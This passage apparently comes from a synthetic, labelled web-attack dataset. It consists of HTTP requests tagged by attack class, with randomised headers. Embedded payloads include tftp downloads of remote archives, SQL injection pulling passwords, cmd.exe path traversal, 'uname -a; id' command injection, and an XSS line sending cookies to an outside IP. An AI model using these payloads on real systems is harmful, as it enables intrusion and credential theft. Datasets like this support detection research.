hBhM4kr=iNkCOIGvn77&a3Ao=tfita telsghSri ecmd&HevalYwfromwuuKvUbetween=1)hu6erdnupdateOl&caepl3d6sjfoit=itaaact&Ikcd50amochaHjuL=ou?n&aasArd=kj4Yw7&PK_dki6=4idsen9re&Md@A4@.=w&iawioregm2gb=<!--  #odbc  connect="Eeiosb,s6,nin8j"     statement="select     *   from   rdsh8"-->

End - Id: 40772
Start - Id: 43027
class: OsCommanding
PUT /pzk/lcisyneksbeoimttiutd/aSx/iYBTiQJDDCnOo6./nha.gif? HTTP/1.1
Content-Length: 333
Content-Language: Imoxiwvo,atd
Content-Encoding: compress
Content-Location: http://www.tmchiAec.de/fadanrbt/tn2sw/c2hie/uerP/rt9tn.jsp
Content-MD5: bmFnZXJTYW96YWVnYXVqMw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 12 Jan 10 10:31:06 CET
Last-Modified: Fri, 06 Jun 08 07:21:36 UTC
Host: 243.189.118.48
Connection: keep-alive
Accept: */*
Accept-Charset: euc-jp, x-mac-roman;q=0.3, koi8;q=0.2, iso-8859-2, iso-2022-kr
Accept-Encoding: *;q=0.4
Accept-Language: 7sl7rt-tms;q=0.8, i1yje-osshP, 9i9d-Rn3t, djiette-pG
Cache-Control: min-fresh=4149
Client-ip: 212.119.175.109
Cookie: dmngynsAyaa=mre;nuwr=37rakrtiarfqkc:A;ewoedtretblOG==te;0dBJ2pSENZVk=go;oF1NrZ=htaccesscriptscriptm
Cookie2: $Version="911"
Date: Thu, 29 Apr 10 11:11:57 CET
ETag: W/"w9X0IN3s8wdXjUj@6M_"
Expect: 100-continue
From: 1ke4@enu9hmpEs.ch
If-Modified-Since: Mon, 15 Aug 05 18:07:17 UTC
If-Unmodified-Since: Wed, 14 Apr 10 15:40:43 UTC
If-Match: "cTmFzcv76Y0YMTeeo6"
If-None-Match: *
If-Range: *
Max-Forwards: 7026
Pragma: bpHyiwu=rwt
Proxy-Authorization: NTLM eGV0aXNuc29ydXBqdERwdGVpU25vMHNhbGFvYmJiemFrT2NyYWVoZWhk
Authorization: Basic MW5ydzJpOmg2cHNvNEU=
Range: -98633,070828-,-9277
Referer: http://lnMot.ch/tnChnno/nei9lnN/CSZoese/deiNen.php
TE: gzip;q=0.5,deflate
Trailer: Connection
User-Agent: Mozilla/6.2 (Windows; U; Win98 2.7; 6h-wd; rv:3.8.1) Gecko/50168501
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2695x320
Via: 1.1 www.mdlaeei.html, HTTP/8.5 76.222.119.122, HTTP/7.3 www.iuexga.tiff
Transfer-Encoding: od1ha
Upgrade: p2tir/9.7, ante/3.0, yetR/9.1, 99uamy/7.6
Warning: 949 www.umlpttl.html:72 "q3sco" "Sat, 17 Jul 04 20:43:31 GMT"
X-Forwarded-For: 225.212.15.105
X-Serial-Number: 4857297063808
----: ------------
~~~~~: ~~~~~~~~~~~~~~

fS0hX5=h' a&1oitetfrcWi6cpn=etI3&lrTieiOsly4tryy='  ; tftp  -c    get    www.ntri.com:/ares.tar&liNtrpzl=v_6_tKewb458&h6iUEnr=0651103180&5socsntaESbmeis=ekr&t4seseqdgLt=dn$~it&trtaufdofIhot=uattls+elebin%a>cimgo$likeh&swj9b5rbuhi=0330854&ru7nHhrosgh8ef=idx&zgsei695=Gtmpogs&4m3OUQy6Qow=0009&nh3c=altq&Ihdix=xTq9

End - Id: 43027
Start - Id: 41389
class: SqlInjection
POST /E0H6lAL/e4bxiqedwtnetSTapto/he1V0JT-F/ev.@FSpOWb/ma/myOUfF@P8WtiJhxPn/rUjrd/dIH7iDlW1.pl? HTTP/1.0
Content-Length: 350
Content-Language: lAMZyhd,m,eheiaa7
Content-Encoding: identity
Content-Location: http://www.nnwnptmR.net/oot5i/tthcn/itlreie.avi
Content-MD5: dW50cmdjZGpPZWN6OWV2Yw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 09 Jan 08 21:28:21 UTC
Last-Modified: Thu, 03 Feb 05 20:45:59 GMT
Host: www.82ADtScn.cz:80
Connection: 1ume
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: max-stale
Client-ip: 65.244.212.38
Cookie: Esrdul3Tndynd=hndn3g8t8nnyt;ay=rp&msY]ey;tyhmtwsp=Er1xterm'Aeu s] e ;eet51esu3d8x=61156;omncEeteet=o7ruie
Cookie2: $Version="98"
Date: Sun, 11 Jan 04 03:28:17 GMT
ETag: "lIiRlIPKte_9Hpgpj"
Expect: Ezwosie
From: eoiypoA@6niCt.fr
If-Modified-Since: Sun, 26 Jul 09 17:20:21 CET
If-Unmodified-Since: Tue, 08 May 07 08:35:36 CET
If-Match: *
If-None-Match: "0V6-Bjn_x5i36DQcW1YQ"
If-Range: "HB64axQpcWVoMO5qTqJ"
Max-Forwards: 996
MIME-Version: 2.2
Pragma: osd='1k75ipmn'
Proxy-Authorization: Digest opaque="ia4zuj"
Authorization: Basic dGhlYml5YzpubnVVTHAw
Range: 711-
Referer: http://www.ea5dtngc.cz/lgaE/lhqdm/oagp.pdf
TE: chunked;q=0.2
Trailer: Upgrade
User-Agent: o5sthdap/2.8.0.8.3
UA-CPU: 68000
UA-Disp: 727,089,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 1178x5140
Via: 5.3 190.124.190.99
Transfer-Encoding: identity
Upgrade: i0t/1.0, giat/1.3
Warning: 978 www.aeers.png "pstsl2qua0E" "Sat, 06 Mar 10 21:32:52 GMT"
X-Forwarded-For: 172.76.114.81
X-Serial-Number: 3067055271
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

ueal9oeioinao=p025Co&evre1=nayVI5M@W&ooaea=';   begin  declare  @ret   varchar(8000)    set  @ret=':'     select     @ret=@ret+'    '+sitd+'/'+password  from  ne  where    9js>@ret select     @ret   as     ret     into   foo    end--&LJm_aLbd=gXx&n7Snen2uee4=7df&sud2Ehtexaop=6&ndraY=kVOiOuv&oLg=Ts

End - Id: 41389
Start - Id: 38342
class: LdapInjection
GET /taN0-EBNAELq2W7UuYbc/aL/oth@RiUz/jxUFScHB_w5tXh/Oe/tiIFupdate-UC3QNMU/.perl5_00htpass/rEeehtoRbfu/n6ZD4IawQfWU-ejM/eu4a.shtml?r0teah=tte4&h7uito0iOrEas0=%29+%28++++%7C++++%28+cn%3D*o+++%27brien*%29%28mail%3D*o+++%27brien*+++%29+++&7f7kgrcOt=O2pd%29nuie&oedtd7oIessrrwe=nxvgQqEht8dt&binflnN=18886&eT8HWechoHaf=sEB_2iTRs&pwsei=sncn%3Bu9T4nxtbekac6%3C&rs1tl6sdafp4axR=c3aeu14esmfh HTTP/1.0
Host: www.eelanisr.net:09
Connection: close
Accept: */*;q=0.5
Accept-Charset: macintosh;q=0.9
Accept-Encoding: identity;q=0.3, gzip;q=0.8, compress;q=0.2
Accept-Language: O-ton;q=0.6, to30-dsaseca;q=0.4, iyehi82i-aNwC
Cache-Control: min-fresh=86
Client-ip: 103.183.132.251
Cookie: hnSsebam=931322;rssonem8hreTwde= rau?r2hsst nr
Cookie2: $Version="10"
Date: Mon, 03 May 04 08:35:16 CET
ETag: W/"jY2.4@.9Gn685Hve_bc"
Expect: ee1djAb=esieE;iliet=pzhU
From: ha6o@adqussrlf.gov
If-Modified-Since: Sat, 16 Jun 07 13:12:33 UTC
If-Unmodified-Since: Wed, 13 May 09 01:08:00 UTC
If-Match: *
If-None-Match: "PMHHu.9VKtT0TGC"
If-Range: *
Max-Forwards: 0
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: NTLM aGJ1dG90aG9uYWJpZXU4YXNTZGxhb2ZvYXh6bHRpczBvYWQ3dGVwaHBFdGRkYQ==
Authorization: NTLM bXB0aXhhMGFvZWM3YWhzZXNnb3RzdGVzeGFsb1RjSGxDMGNhOG5lcmloaHM=
Range: -983,67-,-090
Referer: http://ix0oshi.de/ziknirn/5kbR/dodrij.txt
TE: trailers,chunked,chunked;q=0.5
Trailer: Pragma
User-Agent: bpeM (n7S4zilKxa; oO2P0UJz; rB31mn)
UA-CPU: 68000
UA-Disp: 854,896,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 896x746
Via: uiwtsY/9.5 www.hnetr.jpeg, itow/7.8 www.iaxw.js
Transfer-Encoding: gzip
Upgrade: o7w/9.0, ohy/4.6
Warning: 566 www.yfryp.tiff "ewpadovcn" 
X-Forwarded-For: 176.194.226.79
X-Serial-Number: 0735348068
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38342
Start - Id: 36581
class: OsCommanding
GET ..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.or0td9Ti.it
Connection: h7o8un
Accept: text/html, audio/x-wav;q=0.7
Accept-Charset: x-mac-chinesesimp, windows-1255, windows-1255;q=0.5, iso-8859-8;q=0.0
Accept-Encoding: identity, gzip;q=0.0
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 252.39.154.149
Cookie: Srqi4rLgu5ioR2t=reszt;Xo7Tn=4;y_j02OlW=8121813970;iei=doSlo;.22N=33355157
Cookie2: $Version="3"
Date: Thu, 05 Jan 06 15:51:10 GMT
ETag: W/"ii87XQjje42GUbBHrDr"
Expect: 100-continue
From: osNAoh@aHn2nry.de
If-Modified-Since: Fri, 06 Aug 04 02:57:58 CET
If-Unmodified-Since: Sun, 02 May 04 18:03:23 UTC
If-Match: "OyiTqp.o2UvPoyP3I"
If-None-Match: *
If-Range: "YkdFyFmR4vc.Sz8ebw"
Max-Forwards: 98
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic cnMzcjpsMGVBQTc=
Range: 603-731460,2527-,65-
Referer: /iiino/looDmc6/oiq28/su7neo.tar
TE: trailers,deflate
Trailer: If-Modified-Since
User-Agent: Mozilla/0.5 (Machintosh; U; PPC 3.7; dh-8g; rv:6.7.6) Gecko/53966404
UA-CPU: PowerPC
UA-Disp: 380,5893,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 477x077
Via: 9.3 www.pghfza.png
Transfer-Encoding: identity
Upgrade: oahg/6.4, 3ju/1.3, e2t/8.6
Warning: 353 98.201.134.39 "fe2bemhte" 
X-Forwarded-For: 50.37.241.255
X-Serial-Number: 8032084316017934872
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36581
Start - Id: 36820
class: OsCommanding
GET /lWo.Qqo.nsf?ttjuGn7n=zssamte&ay=oenfrEyy%7Ce73+thi&fqvrRtaE=z-cuniongeeoO+eIDer&_Qbnetcat6include-WK=%27+%3B+++++tftp++++-c+get+++++www.rese.com%3A%2Fet.tar&EsSyakysn2d=ocenIh HTTP/1.1
Host: 254.240.250.207:460
Connection: toufmm
Accept: */*;q=0.7
Accept-Charset: iso-2022-jp;q=0.7, x-mac-japanese, big5
Accept-Encoding: 
Accept-Language: *
Cache-Control: si='am4dy'
Client-ip: 108.91.8.21
Cookie: eQnMepNti8e=noeedg;dri=ooe;djbinV=ya;Vnph-K346htpass=dle
Cookie2: $Version="433"
Date: Mon, 12 Nov 07 18:46:38 GMT
ETag: W/"bxR1QgfsUgshIYR6I"
Expect: 100-continue
From: snesreme@aDfeh6odeu.gov
If-Modified-Since: Wed, 21 Nov 07 01:07:25 GMT
If-Unmodified-Since: Sat, 11 Aug 07 21:01:20 GMT
If-Match: "m.weT1rjei6Vefie"
If-None-Match: *
If-Range: *
Max-Forwards: 25
MIME-Version: 9.1
Pragma: naet=gXSsthfe
Proxy-Authorization: Digest response="58C55118C31Bc2CeF0dbFC24cD1DCe18"
Authorization: Basic c25pb3JncjppbjFvcnRyVw==
Range: -95
Referer: http://heey8epi.it/ai2Ts4og.dll
TE: deflate;q=0.9,gzip
Trailer: If-Match
User-Agent: Mozilla/8.2 (Machintosh; U; PPC 5.8; cr-sn; rv:7.3.8) Gecko/05892566
UA-CPU: Sparc
UA-OS: Win98
UA-Color: color32
UA-Pixels: 1930x9863
Via: 8.1 26.230.241.19, 9.7 www.andt.js:6584
Transfer-Encoding: identity
Upgrade: er9lae/9.7, tsv3/3.1, ouoda/7.7, rtop/0.7
Warning: 649 www.csc0sg.js "anssgt3hmn3ennroren" "Wed, 05 Dec 07 14:41:31 UTC"
X-Serial-Number: 076281973736224985
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36820
Start - Id: 46540
class: XSS
GET /<script>alert('Vulnerable')</script>.jsp? HTTP/1.1
Host: www.drsortEg.fr:44
Connection: keep-alive
Accept: image/gif;q=0.1, audio/*, image/jpeg;q=0.9
Accept-Charset: windows-1257, utf-7
Accept-Encoding: 
Accept-Language: ntis5ec-n, Aaett-itte5ph, mdnda-neciroO, tsib-neoNtueI;q=0.2
Cache-Control: min-fresh=967
Client-ip: 152.60.21.25
Cookie: srnblaIaksxt=1823
Cookie2: $Version="0"
Date: Thu, 27 Dec 07 10:45:41 UTC
ETag: "2tchV3o_V1MPEQcePm"
Expect: 100-continue
From: ns7rogjc@npah.it
If-Modified-Since: Thu, 27 Apr 06 01:13:23 CET
If-Unmodified-Since: Wed, 24 May 06 17:59:03 UTC
If-Match: "48FzKeCqWQkpmIJoqv4i"
If-None-Match: "8L9FnjWtU@u@r@3g7l.c"
If-Range: Wed, 30 Dec 09 11:28:25 CET
Max-Forwards: 850
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Basic ZW94ZW9vYjplaEw2
Authorization: tye8 wrtary=sdoio
Range: 5417-,7803-59243
Referer: /rsbl5ww/j2fo/iTntieiz/e2sucetg.swf
TE: trailers
Trailer: Pragma
User-Agent: ewmtz12e/5.3
UA-CPU: x86
UA-Disp: 884,253,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 139x000
Via: 1.8 www.iqoan0t.jpeg:650, 1.6 219.152.179.179:00311
Transfer-Encoding: gzip
Upgrade: ier7qt/0.9, a9hc/3.6, ins/7.0, tttS5/5.5
Warning: 034 www.etht.jpeg:884 "dpke7ieui1ew0" 
X-Serial-Number: 907134703793407479
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46540
Start - Id: 48778
class: XPathInjection
GET /rZNIAvEt9o8S7S2/uSbnr1@v7eP0gQ/5izi54tishzaheyQl.aspx?pa=76986&tieeJ4=mclid9oe%28%7Emt0&18hd7i4eececr=2+or++++jv%2FTtnge%2Feohio%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D4%5D+or++95114%3D&wtEdi6NbaL=nd5mnmsisAeetr&2nf5lsr=l HTTP/1.1
Host: 250.102.173.13
Connection: close
Accept: */*;q=0.2
Accept-Charset: x-mac-arabic, windows-1252
Accept-Encoding: gzip, compress;q=0.4
Accept-Language: ta-hrarsa;q=0.5, ehn-tx, au-tqe;q=0.7
Cache-Control: no-transform
Client-ip: 124.62.208.222
Cookie: c0dM8group bya1=7a;WDqZyQL=iO3;5Tooo=kfTTYUe2l3BU;triheRett=8344977
Cookie2: $Version="1"
Date: Fri, 06 Mar 09 19:09:52 UTC
ETag: "XaSF7ffVYiharLa0lA"
Expect: 1iorty=eRge6q1n;izgc=atllh1ah
From: eaa6xs@nsEi2dUOb.uk
If-Modified-Since: Tue, 21 Mar 06 21:01:48 CET
If-Unmodified-Since: Thu, 06 Jan 05 23:22:59 GMT
If-Match: "F.VxcKC-Wk0lF.m"
If-None-Match: *
If-Range: "4_d.cDml6FhaFv4"
Max-Forwards: 4718
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: NTLM dnRyaGhlbHJpbHRndG1uYWh3aWVjZWVtdFNodHJlRHJ0dHNlbnJybnVhYW5oSHQ=
Authorization: etllH 3Ru8ttge=taSgioeb
Range: -333764,-7
Referer: /tSnoilat/Tiqqs.dll
TE: trailers,trailers,chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/0.7 (compatible; Konqueror/6.0; Unix; arloplcSao; qaOcjxge; Irnwoltehe)
UA-CPU: MIPS
UA-Disp: 065,1900,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 0640x829
Via: Laei/6.1 www.t4exti.jpg
Transfer-Encoding: eokhc; dyEst=b0uq4
Upgrade: dMji/4.6, m1ce/2.1, ittqim/8.3, stojw/5.9, fftt/6.2
Warning: 022 17.182.45.11:3 "otrr6o" "Sun, 18 Jun 06 04:34:44 GMT"
X-Forwarded-For: 35.28.166.160
X-Serial-Number: 265535777881770929
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48778
Start - Id: 47312
class: XSS
GET /cdxS7QXOAi/bDnihweenldouirA.mspx?etnenoarfeS=%3Cstyle+type++++%3D++++%22++text%2Fjavascript++++%22%3E%5Bwindow.open%28%27http%3A%2F%2F87.180.30.105%2Flltich.asp%27%2Bdocument.cookie%29%3B%5D%3C%2Fstyle+%3E&7QandNEoM=459240 HTTP/1.1
Host: 91.108.211.227
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-hebrew
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=65
Client-ip: 107.154.88.110
Cookie: Sst=fsgJnnad&erMbp;xeeomd=ujrEmpbt;tsecnfhrr=o@ira;cmd7jKJVZ9TO=iy'vbscripthtpassrvobject>FR smtawc
Cookie2: $Version="508"
Date: Sat, 30 Aug 08 23:53:03 CET
ETag: W/"kmh.JRxb6nN3qMqK1"
Expect: 100-continue
From: Disah@Tvhzoe.biz
If-Modified-Since: Wed, 25 Oct 06 11:22:27 CET
If-Unmodified-Since: Tue, 07 Jul 09 16:28:04 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 02 Dec 08 22:15:20 CET
Max-Forwards: 505
MIME-Version: 0.1
Pragma: nN=9da
Proxy-Authorization: Digest cnonce="izenb6"
Authorization: NTLM ZUoxb3Rsb2VBdGxFZWVlVjVvYW1ObnMxY2Yxc2dvaGNjZXIx
Range: 498-
Referer: /Nteft/oaad.nsf
TE: gzip;q=0.0,gzip,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/9.5 (Windows; U; Win 9x 9.4; i2-en; rv:0.7.6) Gecko/66019670
UA-CPU: Sparc
UA-Disp: 8442,560,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 5306x1733
Via: FTP/8.4 232.168.110.151, 7.2 www.reean3ty.jpeg
Transfer-Encoding: lgxk
Upgrade: ddnzgk/3.0, pnnt/9.2, eehf/9.2
Warning: 318 www.lawraii.gif:81 "spet7rfthtnscentm3" "Thu, 05 Aug 04 21:32:03 CET"
X-Forwarded-For: 46.124.140.98
X-Serial-Number: 126620
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 47312
Start - Id: 49354
class: XPathInjection
GET /wUTb/c14.p.jpeg?asnoe3neaU=sc0%27++++or+++count%28+path%2Fchild%3A%3Anode%28%29%5Bposition%28++++%29%3D%28%28++++i++++%2B++++j++%2B++++k++%2B++++l%2B1%29%5D++%7C+++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or+++++%27se1%27%3D++++%27++++Iha%27+or HTTP/1.0
Host: 173.219.192.57
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: euc-kr;q=0.3, cp-932;q=0.7, windows-1254
Accept-Encoding: deflate;q=0.2, compress;q=0.1, gzip, deflate;q=0.3, identity;q=0.3
Accept-Language: *
Cache-Control: max-age=71
Client-ip: 253.241.216.81
Cookie: asordhw0erhg=a7uan);ra=cXPiX8R;tbd6uuYdhqEi=wRScf;2pftnnaievidE=styleyrI;DOACo=86895;6oatdofpctae3u=whle
Cookie2: $Version="6"
Date: Thu, 28 Oct 04 23:35:57 UTC
ETag: W/"e7ALYWdkwT_kw1lOFgF"
Expect: 100-continue
From: EgerC@tafwi.com
If-Modified-Since: Sun, 19 Oct 08 05:16:19 GMT
If-Unmodified-Since: Tue, 22 May 07 22:37:34 GMT
If-Match: *
If-None-Match: "ZkqHL@yS@0p-qwgk-y"
If-Range: *
Max-Forwards: 86
MIME-Version: 2.9
Pragma: nha=3ta
Proxy-Authorization: NTLM ZWxpanNqcm1TNm5JaWRyTHI4aHNobzNtVHZsdHRhb2Y4b3Jz
Authorization: Basic ZWVobGdmdDppYmN1Ng==
Range: 896-
Referer: /lo0nsoEs/zmLer/Aiuorsoq.mdb
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Ylahsn (3@FiZ9UvB; bleQ8pPyux; 1aN9xuY9)
UA-CPU: StrongARM
UA-Disp: 646,996,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 953x2070
Via: 3.6 www.icidl6pn.jpeg, 3.4 www.nott.shtml, 8.4 www.8iN5T.htm
Transfer-Encoding: compress
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 168 180.56.143.92 "19ohloeeIes" 
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 68426632486242488
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49354
Start - Id: 45861
class: PathTransversal
GET /iMvQn/oU2xqXNIAlMqq2UJM/eRe-t@wPD2/5r7Xbo_.php?3r6O8XGlWQ@=sOsOKS4&1txImP=ukEmsiyaad&catJQvKtLP=0515269903&l1e=ho+n&etytnarsoid=gnB-c&seeAepyh3mhoik=%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fentere%2Fteninaalar%2Fonilat%2Fit.mspx HTTP/1.0
Host: www.tIfrsnSeit.com
Connection: close
Accept: text/*;q=0.5, audio/basic
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 136.24.127.56
Cookie: cByY=9;etpFenqaPadn=Ke2tlDHi;lhog=3509968;ane6yua=t08wQ
Cookie2: $Version="9"
Date: Fri, 10 Apr 09 17:41:26 GMT
ETag: "NZR.pyFHpDj5.Hgrtt6w"
Expect: hor0
From: lnkmyen@hfeiUitnt.com
If-Modified-Since: Mon, 20 Oct 08 10:31:35 CET
If-Unmodified-Since: Sun, 27 Mar 05 09:17:38 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 21 Mar 08 11:23:39 UTC
Max-Forwards: 66
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: ha2n eocndmf=oIeb
Authorization: Digest uri=/doti8/eosjyiik.exe
Range: 81947-,357703-
Referer: /aeotc.asp
TE: chunked,trailers,trailers
Trailer: Cache-Control
User-Agent: nei9drh2n (zsLWiqTl2; z.irr0sQ; fL0tSY; rXH-BD.; ipIk1OvM6)
UA-CPU: Sparc
UA-Disp: 096,9977,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 0549x672
Via: 3.3 63.142.53.49, 8.7 www.eeai.jpg
Transfer-Encoding: deflate
Upgrade: eAm77t/3.2, rcioQv/9.7, fitc/1.5
Warning: 078 www.eFerJs.html:545 "nhptoteG" 
X-Forwarded-For: 159.83.172.168
X-Serial-Number: 61308570883843
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45861
Start - Id: 38980
class: LdapInjection
GET /Megnaa/oBlgj765XaBtz80qD1F/HzThome7z/qgzWJPSQ_bz.php?dR=eiojm&tsuHc=vesojrn8a2bcxetd&ii=ewrg0%29%28%7C%28eitbf%3D*%29&eisaegCtctlmg9L=9119547&ieorddigrEEo=462455990&cabs4senet=2slyZeee+7dw&lrrid2efeo=6269 HTTP/1.1
Host: www.lnrefoh.fr
Connection: close
Accept: image/gif, audio/x-wav;q=0.7, image/*;q=0.2
Accept-Charset: euc-cn;q=0.6, iso-8859-2;q=0.7
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: max-age=20826
Client-ip: 39.110.44.223
Cookie: bj=71904683;htditendfartF=28
Cookie2: $Version="51"
Date: Fri, 02 Jul 04 04:18:33 GMT
ETag: W/"aTH7ojAKF7GuLTnx"
Expect: 100-continue
From: aPbb@hdints.de
If-Modified-Since: Mon, 22 May 06 02:47:52 CET
If-Unmodified-Since: Mon, 10 Apr 06 21:22:54 GMT
If-Match: "-bh6PVfsKGNMKV-"
If-None-Match: "IXcidcWwp_F18ou8yanP"
If-Range: "HhF1kiMkkPg4wFXvIn"
Max-Forwards: 6
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Basic dlliYjpuaXNk
Authorization: hsarsh iemroH=lnEh69
Range: -026476,-042,-27632
Referer: /etptn0wh/bs7gudi0/ms5k/ehDEii/oa5chA.fgf
TE: trailers,gzip;q=0.7
Trailer: Max-Forwards
User-Agent: 0nme2o9h8/3.5.6.6.9
UA-CPU: MIPS
UA-OS: Win98
UA-Pixels: 8193x847
Via: 7.5 www.uuwuwE.gif, 4.1 www.rsgtnt.jpg
Transfer-Encoding: ouat; nwMsn=ctyo
Upgrade: rsS/8.2, 0dcoT/9.2, sO3bf/3.2, o6e/7.5
Warning: 291 www.9uop.js "voehitwHsNuovsder" "Mon, 25 Jan 10 10:06:46 CET"
X-Serial-Number: 95673
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 38980
Start - Id: 43232
class: OsCommanding
GET /Ashteta5trenNdxw6/g9uC0hYxd/hjDEcKRl2prfbinYN/pF3D1GD-U5Pms/irf2maadx0onat.msf?reUeh=sinsertxmlw%7Cy9%3Aaall1y&tnt9taGod9s=j%7Ce%3F6t&eh=038511&nsw=sbtqk&5si7AEn=lt&r1eeo28xkhute=0023&pammal16tatjp=6654534&uQtpya=++++%3B++++echo%3B++++w+++++%3B++++uname+-a+++%3B++++id&jne=12&documentisivthtacces=1616958728&ieee5sieaEapo=ayC&zoo8a5elwndht=etgheOaa HTTP/1.0
Host: 143.244.169.191
Connection: keep-alive
Accept: audio/x-wav, audio/*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: rsrttIl8-a, irlz-da, Rii-Eeuteiss
Cache-Control: min-fresh=22690
Client-ip: 36.211.14.62
Cookie: krolnRaamatht=6;wLyst=9732350;nplie3t2eel=roeho
Cookie2: $Version="7"
Date: Thu, 04 Nov 04 10:53:04 UTC
ETag: "si0ElM3X@WcQMbzOA"
Expect: WEieent
From: Odth@g78cnm.uk
If-Modified-Since: Thu, 02 Aug 07 16:28:04 GMT
If-Unmodified-Since: Fri, 25 Jan 08 13:13:46 GMT
If-Match: "z1gRx5HDvkwX1ce9"
If-None-Match: *
If-Range: *
Max-Forwards: 379
MIME-Version: 4.4
Pragma: t1=pnthant
Proxy-Authorization: Digest uri=/abtstebu/h4felsd/o370lht/etxsert/rdgGE.asp
Authorization: Basic ZWVyM0U6cmF0dXNl
Range: -80151
Referer: http://isgps8tt.com/or2b.exe
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/6.4 (X11; U; Linux i586 2.6; zr-bk; rv:6.6.1) Gecko/61001980
UA-CPU: 68000
UA-Disp: 1503,1276,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 4808x019
Via: kea1oa/8.3 160.129.43.146
Transfer-Encoding: enoem
Upgrade: tshr/5.3, 5tst/7.5, env/0.8
Warning: 473 www.sStrCzh.js "hicttlor5tflF" 
X-Forwarded-For: 25.139.59.161
X-Serial-Number: 3809752703652
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43232
Start - Id: 42694
class: SqlInjection
POST /zq.Dc9LzGhCHlFKq.tEo/4Q/iee/uYtSo0/ttaeiyklvtbawbseEh.php3? HTTP/1.1
Content-Length: 80
Content-Language: msunb8
Content-Encoding: identity
Content-Location: /txaAiw4/waEel6h/xedo/ReaEe.aspx
Content-MD5: d2V1dDEzbjBsdGlmYWlSdA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 05 Jun 07 22:12:44 CET
Last-Modified: Wed, 31 Oct 07 12:16:25 UTC
Host: www.1dskra.gov
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: iw6-o;q=0.7, egt8-pfaolx
Cache-Control: max-age=20359
Client-ip: 122.44.205.224
Cookie: Mdindoenrsme=6r;tctjaepgee=rfjexlo&from3eye3%uel;iR3oruuy=47547955;areplacesM-KJdivA=oztnuan4ai6a;a7s=hociMish
Cookie2: $Version="319"
Date: Sun, 11 Oct 09 08:43:25 CET
ETag: "ed7gZa1RArhGPxK5xu5S"
Expect: oidof
From: otbn@nnnwOse.ch
If-Modified-Since: Wed, 31 Mar 04 01:21:15 CET
If-Unmodified-Since: Mon, 21 Aug 06 18:24:42 UTC
If-Match: "u9ubvNu8ADFYRo-x"
If-None-Match: "vKaIyUYPy-Y9KuZFv"
If-Range: Thu, 29 Apr 10 24:41:04 UTC
Max-Forwards: 7
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Digest opaque="bii1e"
Authorization: NTLM eWFubm9pZWVvZTRodXJpZml0aThyZW5wemUzb25hNG9rcnMyRQ==
Range: 2455-
Referer: /eywa/othif/wyrahlam/nna76.tar
TE: chunked,trailers,trailers
User-Agent: '  )   UNION ALL  SELECT   AeQ5     FROM  tseis  WHERE  (    '' =   '
UA-Disp: 446,0818,16
UA-OS: WinNT
UA-Color: color16
Via: 9.4 31.127.85.219, 6.6 164.194.76.229, 8.6 www.oxrviir.gif
Transfer-Encoding: deflate
Upgrade: 7t2On/4.9, aeE/2.7, lxstev/8.6
